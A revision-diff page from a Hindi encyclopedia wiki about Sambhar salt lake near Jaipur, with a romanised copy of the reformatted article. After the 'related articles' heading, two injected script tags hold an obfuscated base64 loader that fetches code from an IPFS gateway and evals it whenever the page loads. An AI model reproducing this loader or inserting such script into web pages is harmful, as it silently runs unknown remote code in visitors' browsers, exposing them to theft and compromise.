Difference between revisions of "सांभर झील जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:जयपुर (को हटा दिया गया हैं।))
Line 1: Line 1:
 
[[चित्र:Gadwall-In-Sambhar-Salt-Lake.jpg|thumb|250px|सांभर झील में गडवाल, [[जयपुर]]]]
 
[[चित्र:Gadwall-In-Sambhar-Salt-Lake.jpg|thumb|250px|सांभर झील में गडवाल, [[जयपुर]]]]
*[[भारत]] के [[राजस्थान]] राज्य में [[जयपुर]] नगर के समीप स्थित यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] (खारे पानी) की झील है।  
+
'''सांभर झील''' [[भारत]] के [[राजस्थान]] राज्य में [[जयपुर]] नगर के समीप स्थित है। यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] अर्थात 'खारे पानी' की झील है। यह देश की सबसे बडी खारे पानी की झील और [[नमक]] का सबसे बड़ा स्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है। इस झील से नमक उत्पादन हेतु 'साम्भर नामक परियोजना' भी चलाई जा रही है।
*देश की सबसे बडी खारे पानी की झील सांभर नमक के सबसे बडे स्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है।
 
*इस झील से नमक उत्पादन हेतु 'साम्भर नामक परियोजना' भी चलाई जा रही है।
 
*उत्‍तरी [[भारत]] के चौहान राजाओं की प्रथम राजधानी सांभर पौराणिक दृष्टि से भी महत्‍वपूर्ण है।
 
*यहाँ पर [[शाकंम्‍भरी मंदिर जयपुर|शाकंम्‍भरी माता का मंदिर]] है।
 
*यह झील समुद्र तल से 1,200 फुट की ऊँचाई पर स्थित है।
 
*जब यह भरी रहती है तब इसका क्षेत्रफल 90 वर्ग मील रहता है।
 
*इसमें तीन नदियाँ आकर गिरती हैं।
 
*इस झील से बड़े पैमाने पर नमक का उत्पादन किया जाता है।
 
*अनुमान है कि अरावली के शिष्ट और नाइस के गर्तों में भरा हुआ गाद ही नमक का स्रोत है।
 
*गाद में स्थित विलयशील सोडियम यौगिक वर्षा के जल में घुसकर नदियों द्वारा झील में पहुँचाता है और जल के वाष्पन के पश्चात् झील में नमक के रूप में रह जाता है।
 
  
{{प्रचार}}
+
*[[उत्तर भारत]] के [[चौहान वंश|चौहान]] राजाओं की प्रथम राजधानी सांभर पौराणिक दृष्टि से भी महत्‍वपूर्ण है। यहाँ पर [[शाकम्भरी देवी]] का मंदिर है।
{{लेख प्रगति  
+
*सांभर झील समुद्र तल से 1,200 फुट की ऊँचाई पर स्थित है।
|आधार=
+
*जब यह झील भरी रहती है, तब इसका क्षेत्रफल 90 वर्ग मील रहता है।
|प्रारम्भिक=प्रारम्भिक1  
+
*सांभर झील में तीन नदियाँ आकर गिरती हैं।
|माध्यमिक=  
+
*झील से बड़े पैमाने पर [[नमक]] का उत्पादन किया जाता है।
|पूर्णता=  
+
*अनुमान है कि [[अरावली पर्वतमाला|अरावली]] के शिष्ट और नाइस के गर्तों में भरा हुआ गाद ही नमक का स्रोत है। गाद में स्थित विलयशील सोडियम यौगिक [[वर्षा]] के [[जल]] में घुसकर नदियों द्वारा [[झील]] में पहुँचाता है और जल के वाष्पन के पश्चात झील में नमक के रूप में रह जाता है।
|शोध=
+
 
}}
+
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान की झीलें}}
 
{{राजस्थान की झीलें}}
 
{{भारत की झीलें}}
 
{{भारत की झीलें}}
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]]
+
[[Category:राजस्थान]][[Category:जयपुर के पर्यटन स्थल]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:राजस्थान की झीलें]][[Category:भारत की झीलें]][[Category:जयपुर]]
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:राजस्थान की झीलें]]
 
[[Category:भारत की झीलें]]
 
[[Category:जयपुर]]
 
 
__INDEX__
 
__INDEX__

Revision as of 11:12, 30 December 2012

[[chitr:Gadwall-In-Sambhar-Salt-Lake.jpg|thumb|250px|saanbhar jhil mean gadaval, jayapur]] saanbhar jhil bharat ke rajasthan rajy mean jayapur nagar ke samip sthit hai. yah lavan jal arthat 'khare pani' ki jhil hai. yah desh ki sabase badi khare pani ki jhil aur namak ka sabase b da srot hone ke sath hi paryatan ki drishti se bhi ath‍yanh‍t akarshak sh‍thal hai. is jhil se namak utpadan hetu 'sambhar namak pariyojana' bhi chalaee ja rahi hai.

  • uttar bharat ke chauhan rajaoan ki pratham rajadhani saanbhar pauranik drishti se bhi mahath‍vapoorn hai. yahaan par shakambhari devi ka mandir hai.
  • saanbhar jhil samudr tal se 1,200 phut ki ooanchaee par sthit hai.
  • jab yah jhil bhari rahati hai, tab isaka kshetraphal 90 varg mil rahata hai.
  • saanbhar jhil mean tin nadiyaan akar girati haian.
  • jhil se b de paimane par namak ka utpadan kiya jata hai.
  • anuman hai ki aravali ke shisht aur nais ke gartoan mean bhara hua gad hi namak ka srot hai. gad mean sthit vilayashil sodiyam yaugik varsha ke jal mean ghusakar nadiyoan dvara jhil mean pahuanchata hai aur jal ke vashpan ke pashchat jhil mean namak ke roop mean rah jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>